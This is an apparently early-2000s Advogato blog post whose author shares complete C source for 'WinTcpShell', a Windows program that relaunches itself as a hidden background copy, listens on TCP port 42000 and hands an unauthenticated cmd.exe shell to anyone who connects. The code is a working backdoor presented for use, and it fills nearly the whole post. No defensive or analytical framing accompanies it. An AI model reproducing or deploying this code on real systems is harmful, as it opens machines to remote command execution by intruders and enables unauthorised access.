2 Apr 2001 zophyx   » (Observer)

 I couldn't find any Windows(TM) code that listened on a
 port and spawned a shell, so i wrote some.

/* * WinTcpShell * tcpshell.c * * cl tcpshell.c /link wsock32.lib Ws2_32.lib * * This code runs a copy of itself and then exits. * The copy that is left running in memory opens a port and * waits for a connection. * When a connection is made it runs cmd.exe with stdin, * stdout and stderr piped in and out of the socket. * This code is released into the public domain * with no restrictions other than Microsoft's copyrights * and patents and trademarks and criminal liabilities * that might apply. */

#include <sys\types.h> #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <io.h>

#define LISTENQ SOMAXCONN

WSADATA WSAData; int status; int lsocket = 0; int csocket = 0; struct sockaddr_in laddr; struct sockaddr_in caddr;

int len;

STARTUPINFO si; PROCESS_INFORMATION pi; char spawn_cmd[] = "d:\\winnt\\system32\\cmd.exe"; char copy_command[] = ".\\tcpshell.exe copy";

int main(int argc, char *argv[]) {

printf("%d\nOh boy are we having fun now!\n", argc);

if ((status = WSAStartup(MAKEWORD(2, 0), &WSAData)) != 0) { perror("WSAStartup() error"); exit(1); }

while (1) {

if (argc > 1) {

if (!lsocket) {

if ( (lsocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP, NULL, 0, 0)) == INVALID_SOCKET) { printf("socket error: %0x", WSAGetLastError()); return (10); }

len = sizeof(laddr); memset(&laddr, 0, len); laddr.sin_addr.s_addr = htonl(INADDR_ANY); laddr.sin_family = AF_INET; laddr.sin_port = htons(42000); if ( (bind (lsocket, (const struct sockaddr *) &laddr, len))) { status = WSAGetLastError(); printf("bind error: %d\n", status); exit(1); }

if (listen(lsocket, LISTENQ)) { perror("listen error"); return (10); }

} len = sizeof(caddr); if ((csocket = accept(lsocket, &caddr, &len)) == INVALID_SOCKET) { perror("socket accept"); abort(); }

GetStartupInfo(&si); } else { csocket = 2; }

si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; si.hStdOutput = csocket; si.hStdError = csocket; // set the new // handles // for the spawned // cmd.exe process si.hStdInput = csocket;

// spawn the socket listening copy of this // program // that is left // running in memory if (argc == 1) { if (!CreateProcess (NULL, copy_command, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("error in CreateProcess copy_command"); exit(1); } } // spawn the cmd.exe process that has stdin, // stdout, // and stderr piped // in and out of the socket if (argc > 1) { if (!CreateProcess (spawn_cmd, NULL, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("error in CreateProcess spawn_cmd"); exit(1); } }

if (argc == 1) { exit(0); }

} }

Latest blog entries     Older blog entries

New Advogato Features

New HTML Parser: The long-awaited libxml2 based HTML parser code is live. It needs further work but already handles most markup better than the original parser.

Keep up with the latest Advogato features by reading the Advogato status blog.

If you're a C programmer with some spare time, take a look at the mod_virgule project page and help us with one of the tasks on the ToDo list!